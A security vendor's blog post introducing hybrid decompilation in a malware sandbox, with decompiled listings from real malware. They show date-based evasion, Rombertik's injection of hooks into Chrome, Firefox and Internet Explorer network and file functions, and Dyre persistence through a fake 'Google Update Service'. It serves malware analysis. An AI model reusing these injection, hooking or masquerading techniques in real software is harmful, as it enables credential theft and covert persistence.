
Joe Security's Blog

Pure Innovation: Hybrid Decompilation with Joe Sandbox DEC

Published on: 30.09.2015


Joe Security is proud to announce its latest innovative technology: Hybrid Decompilation (HDC). This unique new feature builds upon Hybrid Code Analysis (HCA) to give malware analysts extensive code analysis capabilities. Joe Sandbox reports already include, for each relevant function found during the analysis, a hybrid low-level disassembly that combines information from both static and dynamic analysis. With the Joe Sandbox DEC plugin, which implements HDC, Joe Sandbox reports can now also display an equivalent high-level C source code representation of each function, which greatly speeds up reverse engineering.

Here is a very simple report extract to illustrate the purpose of this Hybrid Decompilation feature.
Suppose we have the following disassembly for a function in a Joe Sandbox report:


Joe Sandbox DEC will generate the following corresponding C source code:

E00406D20(CHAR* _a4) {
 long _t4;
 void* _t6;

 _t6 = CreateMutexA(0, 1, _a4);
 _t4 = GetLastError();
 if(_t4 == 0xb7) {
  ExitProcess(0);
 }
 if(_t6 != 0) {
  return ReleaseMutex(_t6);
 }
 return _t4;
}

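As this example shows, the source code highlights the function parameter and local variables, and makes the control structures and function calls much more explicit: the function creates a named mutex and terminates the process if GetLastError returns 0xb7 (ERROR_ALREADY_EXISTS), a common way of making sure that only one instance of a program is running.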

 

Decompilation 101

The process of translating machine or assembly code to source code is called decompilation. From a high-level perspective, decompilation is the reverse of compilation: it starts with low-level machine code and builds a higher-level representation in several incremental stages. Decompilation is usually much more efficient and gives better results if it can use symbolic information found in the binary file or in associated debug files.
Decompilation can also be seen as a natural extension of disassembly, and indeed the first stage of a decompilation engine is a disassembler. Besides the usual difficulty of separating code from data during disassembly, however, the decompilation process must also solve the following issues:

  • Rebuild function prototypes and infer local variables while getting rid of register and stack references.
  • Generate high-level control structures (if, switch/case, do/while/for loops) from low-level compares and jumps, and identify calls to known APIs and libraries (such as PE file imports).
  • Retrieve high-level type information (including compound types such as structures and unions). 
  • Assign the correct arguments to function calls.
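The second issue, rebuilding control structures from compares and jumps, can be illustrated with a minimal C sketch. It is not Joe Sandbox DEC code: both functions are hypothetical and reduce the mutex check from the first example to plain integers (-1 stands in for ExitProcess, 1 for ReleaseMutex). The first function mimics a jump-by-jump translation made of goto statements; the second is the structured form a decompiler tries to recover. Both compute the same result.

```c
#include <assert.h>

/* Hypothetical example: 0xb7 is the Windows ERROR_ALREADY_EXISTS code
 * tested in the decompiled mutex function. */

/* Shape of a naive, jump-by-jump translation: each compare followed by a
 * conditional jump becomes "if (cond) goto label". */
static int check_unstructured(long last_error, int handle) {
    if (last_error != 0xb7) goto not_exists;  /* compare, jump if not equal */
    return -1;                                /* stands in for ExitProcess(0) */
not_exists:
    if (handle == 0) goto no_handle;          /* test, jump if zero */
    return 1;                                 /* stands in for ReleaseMutex(handle) */
no_handle:
    return (int)last_error;
}

/* Structured form produced by control-flow structuring: the inverted
 * jump conditions become ordinary if statements, and the labels vanish. */
static int check_structured(long last_error, int handle) {
    if (last_error == 0xb7) {
        return -1;
    }
    if (handle != 0) {
        return 1;
    }
    return (int)last_error;
}
```

Structuring is only correct if it preserves behavior, which is why the two versions must agree on every input.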

This diagram presents the overall architecture of a generic decompilation engine:


Decompilation builds on techniques initially developed for compilation, such as control-flow and data-flow analysis, register allocation, loop transformation and alias analysis. However, decompilation has its own challenges: automatically decompiling arbitrary machine code is generally considered extremely difficult, and even more so for obfuscated malware for which no symbolic information is available. With this in mind, the goal of Joe Sandbox DEC is to give the user a fast decompilation of the most relevant functions found in the analyzed sample, together with a measure of the decompilation's quality.
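As an illustration of the control-flow analysis borrowed from compilers, here is a sketch of the classic "leader" rule that splits a linear instruction listing into basic blocks, usually one of the first steps before a control-flow graph is built. The instruction model (OpKind, Insn) is a hypothetical toy, not Joe Sandbox's internal representation.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical toy instruction model: an instruction either falls through,
 * jumps conditionally, jumps unconditionally, or returns. */
typedef enum { OP_PLAIN, OP_JCC, OP_JMP, OP_RET } OpKind;

typedef struct {
    OpKind kind;
    size_t target;  /* index of the jump target (used by OP_JCC and OP_JMP) */
} Insn;

/* Leader rule used to split code into basic blocks:
 *  1. the first instruction is a leader;
 *  2. every jump target is a leader;
 *  3. every instruction following a jump or a return is a leader.
 * Fills is_leader[0..n-1] and returns the number of basic blocks. */
static size_t find_leaders(const Insn *code, size_t n, int *is_leader) {
    size_t i, blocks = 0;
    assert(code != NULL && is_leader != NULL);
    for (i = 0; i < n; i++) {
        is_leader[i] = 0;
    }
    if (n > 0) {
        is_leader[0] = 1;
    }
    for (i = 0; i < n; i++) {
        if ((code[i].kind == OP_JCC || code[i].kind == OP_JMP) && code[i].target < n) {
            is_leader[code[i].target] = 1;   /* rule 2 */
        }
        if (code[i].kind != OP_PLAIN && i + 1 < n) {
            is_leader[i + 1] = 1;            /* rule 3 */
        }
    }
    for (i = 0; i < n; i++) {
        blocks += (size_t)is_leader[i];
    }
    return blocks;
}
```

For a hypothetical ten-instruction listing with conditional jumps at indices 3 and 6 (targeting 5 and 9) and returns at 8 and 9, the leaders are instructions 0, 4, 5, 7 and 9, which gives five basic blocks.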

Hybrid Decompilation

Compared to a generic decompilation engine, Hybrid Decompilation introduces three powerful features:

  • Instead of running on the initial PE file, which may be packed or contain hidden code, HDC runs on PE files generated from dynamic memory snapshots, which give an accurate picture of the code that is actually executed.
  • HCA provides HDC with input information such as known Windows API calls, string values found to be used by the code, and statement execution status. This is akin to retrieving symbolic information and is very useful for achieving better decompilation results.
  • HDC has an extensive knowledge of Windows API types and function prototypes, thus enabling the use of high-level types in the output source code files.
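Knowledge of API prototypes is what lets a decompiler turn a sequence of pushes followed by a call into a call expression with the right arguments. The sketch below assumes a hypothetical prototype table that only holds parameter counts, and 32-bit code where arguments are pushed right to left; it rebuilds the CreateMutexA(0, 1, _a4) call from the first example. This is not HDC's actual implementation, which would also have to track types and calling conventions.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical prototype table: API name and parameter count only. */
typedef struct {
    const char *name;
    int nargs;
} Proto;

static const Proto kProtos[] = {
    { "CreateMutexA", 3 },  /* lpMutexAttributes, bInitialOwner, lpName */
    { "GetLastError", 0 },
    { "ExitProcess",  1 },  /* uExitCode */
    { "ReleaseMutex", 1 },  /* hMutex */
};

/* Returns the parameter count of a known API, or -1 if it is unknown. */
static int proto_nargs(const char *name) {
    size_t i;
    for (i = 0; i < sizeof kProtos / sizeof kProtos[0]; i++) {
        if (strcmp(kProtos[i].name, name) == 0) return kProtos[i].nargs;
    }
    return -1;
}

/* Operands of pending "push" instructions; the last push is on top. */
typedef struct {
    const char *items[16];
    int top;
} PushStack;

static void push_arg(PushStack *s, const char *operand) {
    assert(s->top < 16);
    s->items[s->top++] = operand;
}

/* Appends src to out without overflowing a buffer of outsz bytes. */
static void append(char *out, size_t outsz, const char *src) {
    strncat(out, src, outsz - 1 - strlen(out));
}

/* 32-bit stdcall/cdecl callers push arguments right to left, so the most
 * recent push is the first argument. Pops as many operands as the
 * prototype declares and renders "api(arg1, arg2, ...)" into out.
 * Returns the argument count, or -1 if the API is unknown or too few
 * operands were pushed. */
static int render_call(PushStack *s, const char *api, char *out, size_t outsz) {
    int nargs = proto_nargs(api);
    int i;
    if (nargs < 0 || nargs > s->top || outsz == 0) return -1;
    out[0] = '\0';
    append(out, outsz, api);
    append(out, outsz, "(");
    for (i = 0; i < nargs; i++) {
        if (i > 0) append(out, outsz, ", ");
        append(out, outsz, s->items[--s->top]);
    }
    append(out, outsz, ")");
    return nargs;
}
```

For example, after pushing _a4, 1 and 0 (in that order), render_call with "CreateMutexA" writes CreateMutexA(0, 1, _a4) and returns 3, while GetLastError consumes no operand at all.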

These features make HDC a big improvement over a purely static decompilation engine:

  • "Better decompilation code coverage": all function entry points discovered by the powerful heuristics of HCA are made available as decompilation entry points.
  • "Better decompilation quality": in particular, knowledge of indirect call targets as provided by HCA makes decompilation both faster and more precise.
  • "Decompiled source code commenting": observed runtime information such as statement execution status and variable values can be added to the decompiled source code as comments.
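Commenting with execution status can be sketched as follows, assuming each decompiled statement keeps the address of the instruction it was generated from and that the dynamic analysis yields a sorted list of executed addresses. The Stmt type, the addresses and the function names are hypothetical; only the "// executed" output format is taken from the listings in this post.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical input: a decompiled statement and the address of the
 * machine instruction it was generated from. */
typedef struct {
    uint32_t addr;
    const char *text;
} Stmt;

/* Binary search: returns 1 if addr is in the ascending list of executed
 * addresses (e.g. collected from a dynamic trace), 0 otherwise. */
static int was_executed(uint32_t addr, const uint32_t *trace, size_t n) {
    size_t lo = 0, hi = n;
    while (lo < hi) {
        size_t mid = lo + (hi - lo) / 2;
        if (trace[mid] == addr) return 1;
        if (trace[mid] < addr) lo = mid + 1; else hi = mid;
    }
    return 0;
}

/* Copies the statement into out and appends " // executed" when the trace
 * shows that its instruction ran. Returns 0, or -1 if out is too small. */
static int annotate(const Stmt *st, const uint32_t *trace, size_t n,
                    char *out, size_t outsz) {
    const char *suffix = was_executed(st->addr, trace, n) ? " // executed" : "";
    size_t need = strlen(st->text) + strlen(suffix) + 1;
    if (need > outsz) return -1;
    strcpy(out, st->text);
    strcat(out, suffix);
    return 0;
}
```

Statements whose address never shows up in the trace are left uncommented, so the static code for paths not taken at runtime stays visible next to the observed ones.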

Some Hybrid Decompilation Source Code Outputs

Let us now look at some actual examples of C source code generated by HDC to get a taste of the power of Hybrid Decompilation.
The first decompiled function is extracted from the sample studied in the blog post http://joe4security.blogspot.ch/2015/04/the-power-of-execution-graphs-part-13.html.


E0040912A(void* __edi, void* __eflags, long _a4) {
 long _v8;
 long _v12;
 long _v16;
 struct _SYSTEMTIME _v32;
 void* _t13;
 void* _t17;
 void* _t28;
 signed int _t29;
 void* _t30;
 void* _t32;
 CHAR* _t35;

 _t32 = __edi;
 _t35 = _a4;
 E00406DB0(_t35);
 _pop(_t29);
 GetSystemTime( &_v32);
 if(_v32.wMonth >= 0xb && _v32.wYear >= 0x7da) {
  ExitProcess(0); // executed
 }
 _t13 = E004070C0();
 _t40 = _t13;
 if(_t13 != 0) {
  E00408A06(_t29, __eflags, _t35);
  _pop(_t29);
 } else {
  E00406E00();
 }
 E004084F7(_t29, _t40, _t35);
 _t41 =  *0x4011e8 - 1;
 _pop(_t30);
 if( *0x4011e8 == 1) {
  E00409900();
 }
 E00409029(_t28, _t30, _t32, _t41);
 _push(_t35);
 _t17 = E00408220();
 if(_t17 != 0) {
  return _t17;
 } else {
  _push(_t32);
  if(_v32.wMonth >= 7 && _v32.wYear >= 0x7da) {
   CreateThread(0, 0, E004098A0, 0, 0,  &_a4);
   CreateThread(0, 0, E00407180, 0, 0,  &_v8);
   CreateThread(0, 0, E00407230, 0, 0,  &_v12);
   if( *0x4011dc == 1) {
    CreateThread(0, 0, E00407A80, 0, 0,  &_v16);
   }
  }
  L14:
  Sleep(0x3ab0);
  goto L14;
 }
}

The source code clearly highlights the condition on the system time under which the sample immediately terminates (lines 18 to 20, counting the function signature as line 1): it exits if the month is November or later (wMonth >= 0xb) and the year is 2010 or later (wYear >= 0x7da). Thanks to HDC, the "// executed" comment on line 20 tells us that this evasive behavior was triggered during the analyzed sample’s run. Still, the static component of Hybrid Decompilation shows what happens in the non-evasive case. In particular, several threads may be created at lines 44 to 48, and the corresponding calls to CreateThread have explicit arguments, including a reference to the function executed by each new thread.
Our second decompiled example is a function belonging to a PE file dropped by the Rombertik malware (see the analysis at http://www.joesecurity.org/reports/report-f504ef6e9a269e354de802872dc5e209.html):
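The two date checks of this function can be replayed in a small portable C sketch. DateFields is a hypothetical stand-in for the two SYSTEMTIME members the sample reads, and the constants are the ones from the listing (0xb is 11, 0x7da is 2010). Because month and year are compared separately rather than as a single date, the exit condition only holds in November and December of 2010 or any later year; in March 2015, for example, it is false.

```c
#include <assert.h>

/* Hypothetical portable stand-in for the SYSTEMTIME fields the sample reads. */
typedef struct {
    unsigned short wYear;
    unsigned short wMonth;
} DateFields;

/* Same test as the decompiled exit check: month >= 11 and year >= 2010,
 * each field compared on its own. */
static int exits_immediately(DateFields t) {
    return t.wMonth >= 0xb && t.wYear >= 0x7da;
}

/* Same test as the one guarding the CreateThread calls: month >= 7. */
static int starts_threads(DateFields t) {
    return t.wMonth >= 7 && t.wYear >= 0x7da;
}
```

Since both checks read the same _v32 value, a run that does not exit and reaches the CreateThread branch (assuming E00408220 returns 0) must have a month between July and October and a year of at least 2010.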

E00401960() {
 void _v5;
 void _v6;
 void _v7;
 int _v12;
 int _v16;
 char _v280;
 long _v292;
 long _v308;
 void* _v316;
 char _v572;
 char _v828;
 char* _t36;
 char* _t39;
 void* _t42;
 intOrPtr* _t44;
 int _t46;
 intOrPtr* _t47;
 intOrPtr* _t51;
 int _t54;
 void* _t59;
 _Unknown_base(*)()* _t62;
 void* _t69;
 void* _t71;
 void* _t74;
 int _t77;
 int _t79;
 long _t82;
 void* _t94;
 void* _t98;
 void* _t99;
 void* _t100;

 _v316 = 0x128;
 _t77 = 0x100;
 _t36 =  &_v828;
 goto L1;
 L4:
 _t79 = 0x100;
 _t39 =  &_v572;
 do {
   *_t39 = 0;
  _t39 = _t39 + 1;
  _t79 = _t79 - 1;
 } while (_t79 != 0);
 _v12 = 0x100;
 CryptStringToBinaryA("aWV4cGxvcmUuZXhl", 0x10, 1,  &_v572,  &_v12, 0, 0);
 while(1) {
  _t42 = CreateToolhelp32Snapshot(2, 0); // executed
  _v12 = _t42;
  Process32First(_t42,  &_v316); // executed
  do {
   _t44 = "chrome.exe";
   do {
    _t44 = _t44 + 1;
   } while ( *_t44 != 0);
   _t46 = StrCmpNA( &_v280, "chrome.exe", _t44 - "chrome.exe"); // executed
   if(_t46 != 0) {
    _t47 =  &_v572;
    if(_v572 == 0) {
     L20:
     if(StrCmpNA( &_v280,  &_v572, _t47 -  &_v572) != 0) {
      _t51 = "firefox.exe";
      do {
       _t51 = _t51 + 1;
      } while ( *_t51 != 0);
      if(StrCmpNA( &_v280, "firefox.exe", _t51 - "firefox.exe") != 0) {
       goto L39;
      }
      _t99 = OpenProcess(0x1fffff, 0, _v308);
      if(_t99 == 0) {
       goto L39;
      }
      _t59 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "CreateFileW");
      if(_t59 == 0) {
       L38:
       CloseHandle(_t99);
       goto L39;
      }
      _v6 = 0;
      if(ReadProcessMemory(_t99, _t59,  &_v6, 1, 0) != 0 && _v6 != 0xe9) {
       _push(_t99);
       _push(E004018E0);
       L35:
       _t62 = E00402690();
       _t100 = _t100 + 8;
       if(_t62 != 0) {
        _t94 = CreateRemoteThread(_t99, 0, 0, _t62, 0, 0, 0);
        if(_t94 != 0) {
         WaitForSingleObject(_t94, 0xffffffff);
         CloseHandle(_t94);
        }
       }
      }
      goto L38;
     }
     if(E00402AE0( &_v828) == _v292) {
      goto L39;
     }
     _t99 = OpenProcess(0x1fffff, 0, _v308);
     if(_t99 == 0) {
      goto L39;
     }
     _t69 = GetProcAddress(LoadLibraryA("Wininet.dll"), "HttpSendRequestW");
     if(_t69 == 0) {
      goto L38;
     }
     _v5 = 0;
     if(ReadProcessMemory(_t99, _t69,  &_v5, 1, 0) == 0 || _v5 == 0xe9) {
      goto L38;
     } else {
      _push(_t99);
      _push(E00402040);
      goto L35;
     }
    }
    do {
     _t47 = _t47 + 1;
    } while ( *_t47 != 0);
    goto L20;
   }
   _t71 = E00402AE0( &_v828);
   _t82 = _v292;
   if(_t71 == _t82) {
    goto L39;
   }
   _t99 = OpenProcess(0x1fffff, 0, _t82);
   if(_t99 == 0) {
    goto L39;
   }
   _t74 = GetProcAddress(LoadLibraryA("Ws2_32.dll"), "WSASend");
   if(_t74 == 0) {
    goto L38;
   }
   _v7 = 0;
   if(ReadProcessMemory(_t99, _t74,  &_v7, 1, 0) == 0 || _v7 == 0xe9) {
    goto L38;
   } else {
    _push(_t99);
    _push(E004012A0);
    goto L35;
   }
   L39:
   _t98 = _v12;
   _t54 = Process32Next(_t98,  &_v316); // executed
  } while (_t54 != 0);
  if(_t98 != 0) {
   CloseHandle(_t98); // executed
  }
  Sleep(0x1388); // executed
 }
 L1:
  *_t36 = 0;
 _t36 = _t36 + 1;
 _t77 = _t77 - 1;
 if(_t77 != 0) {
  goto L1;
 } else {
  _v16 = 0x100;
  if(CryptStringToBinaryA("ZXhwbG9yZXIuZXhl", 0x10, 1,  &_v828,  &_v16, 0, 0) == 0) {
   _v16 = 0;
  }
  goto L4;
 }
}

The decompiled source code makes it clear that this function enumerates all processes (infinite while loop starting at line 48) and looks for browser names such as “iexplore.exe” (call to StrCmpNA at line 62; the browser name is Base64-encoded and decoded by the call to CryptStringToBinaryA on "aWV4cGxvcmUuZXhl" at line 47), “chrome.exe” (line 57) and “firefox.exe” (line 67). Once a process corresponding to one of these browsers is found, the function tries to hook a function of a DLL loaded in the browser's memory, using a different target for each browser: CreateFileW for Firefox (line 74), HttpSendRequestW for Internet Explorer (line 104) and WSASend for Chrome (line 131). The calls to ReadProcessMemory (lines 81, 109 and 136) read the first byte of the target function, and the hook is only attempted if that byte is not 0xe9, the x86 opcode of a relative JMP, i.e. if the function does not already appear to be hooked. The actual hook injection is then performed with a call to CreateRemoteThread at line 88.
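The Base64 strings passed to CryptStringToBinaryA (whose third argument, 1, is CRYPT_STRING_BASE64 and whose second argument, 0x10, is the string length) can be decoded with a few lines of portable C. This is a minimal decoder written for illustration, not code taken from the sample; it confirms that "aWV4cGxvcmUuZXhl" decodes to iexplore.exe and that the second string of the function, "ZXhwbG9yZXIuZXhl" (line 160), decodes to explorer.exe.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Value of one Base64 character, or -1 if it is not in the alphabet. */
static int b64_value(char c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decodes NUL-terminated Base64 text into out and NUL-terminates it.
 * Stops at '=' padding. Returns the number of decoded bytes, or -1 on an
 * invalid character or if out is too small. */
static int b64_decode(const char *in, char *out, size_t outsz) {
    unsigned int acc = 0;  /* bit accumulator; only its low bits matter */
    int bits = 0;          /* number of pending bits in acc */
    size_t len = 0;
    if (outsz == 0) return -1;
    for (; *in != '\0' && *in != '='; in++) {
        int v = b64_value(*in);
        if (v < 0) return -1;
        acc = (acc << 6) | (unsigned int)v;  /* 6 bits per character */
        bits += 6;
        if (bits >= 8) {                     /* a full byte is available */
            bits -= 8;
            if (len + 1 >= outsz) return -1; /* keep room for the NUL */
            out[len++] = (char)((acc >> bits) & 0xFF);
        }
    }
    out[len] = '\0';
    return (int)len;
}
```

Each group of four Base64 characters carries 24 bits, so the 16-character strings decode to 12 bytes each.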

Our last decompiled source code example is extracted from the Dyre Banking Trojan. This malware achieves persistence by registering as the “Google Update” system service using the following function:

E00402900(short* _a4) {
 signed int _t2;
 void* _t5;
 int _t13;
 void* _t20;
 void* _t25;

 _t2 = OpenSCManagerW(0, 0, 2);
 _t20 = _t2;
 if(_t20 != 0) {
  WriteConsoleW(0, 0, 0, 0, 0);
  while(1) {
   _t5 = CreateServiceW(_t20, L"googleupdate", L"Google Update Service", 0xf01ff, 0x10, 
                        2, 1, _a4, 0, 0, 0, 0, 0);
   if(_t5 != 0) {
    break;
   }
   if(RtlGetLastWin32Error() != 0x431) {
    L7:
    return CloseServiceHandle(_t20) | 0xffffffff;
   } else {
    _t25 = OpenServiceW(_t20, L"googleupdate", 0xf01ff);
    if(_t25 == 0) {
     goto L7;
    } else {
     _t13 = DeleteService(_t25);
     CloseServiceHandle(_t25);
     if(_t13 != 0) {
      continue;
     } else {
      goto L7;
     }
    }
   }
   goto L9;
  }
  CloseServiceHandle(_t5);
  CloseServiceHandle(_t20);
  return 0;
 } else {
  return _t2 | 0xffffffff;
 }
 L9:
}

Once a handle to the service control manager is obtained (lines 8 to 10), the sample tries to create a “Google Update Service” service (line 13) in a loop starting at line 12. If it succeeds, it exits the loop (line 16); otherwise, it checks whether the service creation at line 13 failed with the ERROR_SERVICE_EXISTS error code 0x431 (line 18). If this is the case, it tries to delete the existing service (lines 22 to 27) and then loops back to retry creating the malicious service (line 29).
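The numeric arguments in this listing can be made even more readable by mapping them to their Windows SDK names, the kind of API knowledge described earlier. The sketch below uses a hypothetical lookup table keyed by API and argument position; the symbolic names are the documented SDK constants. It shows, for instance, that the 2 passed as the sixth argument of CreateServiceW is SERVICE_AUTO_START, which makes the service start automatically at system startup (by the same prototype knowledge, _a4 is the eighth argument, lpBinaryPathName, i.e. the path of the executable the service runs).

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical symbol table: API, 1-based argument position, numeric
 * value and the corresponding Windows SDK constant name. */
typedef struct {
    const char *api;
    int arg;
    unsigned long value;
    const char *symbol;
} ApiConst;

static const ApiConst kConsts[] = {
    { "OpenSCManagerW", 3, 0x2ul,     "SC_MANAGER_CREATE_SERVICE" },
    { "CreateServiceW", 4, 0xf01fful, "SERVICE_ALL_ACCESS" },
    { "CreateServiceW", 5, 0x10ul,    "SERVICE_WIN32_OWN_PROCESS" },
    { "CreateServiceW", 6, 0x2ul,     "SERVICE_AUTO_START" },
    { "CreateServiceW", 7, 0x1ul,     "SERVICE_ERROR_NORMAL" },
    { "OpenServiceW",   3, 0xf01fful, "SERVICE_ALL_ACCESS" },
};

/* Returns the symbolic name for a constant passed as argument `arg` of
 * `api`, or NULL if none is known (the raw number is then kept). */
static const char *symbolize(const char *api, int arg, unsigned long value) {
    size_t i;
    for (i = 0; i < sizeof kConsts / sizeof kConsts[0]; i++) {
        if (kConsts[i].arg == arg && kConsts[i].value == value &&
            strcmp(kConsts[i].api, api) == 0) {
            return kConsts[i].symbol;
        }
    }
    return NULL;
}
```

Keying the table by argument position matters because the same number means different things in different slots: 2 is SERVICE_AUTO_START as CreateServiceW's sixth argument but SC_MANAGER_CREATE_SERVICE as OpenSCManagerW's third.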

Conclusion


Thanks to its Hybrid Decompilation technology, Joe Sandbox DEC outputs decompiled functions that are much more readable than the associated disassembly, and thus gives quick and precise insight into what each function does. Overall, reverse engineering complex malware becomes more efficient: hard-to-decompile functions are pinpointed, so the analyst can concentrate on studying them and fall back on the still-available disassembly only when necessary.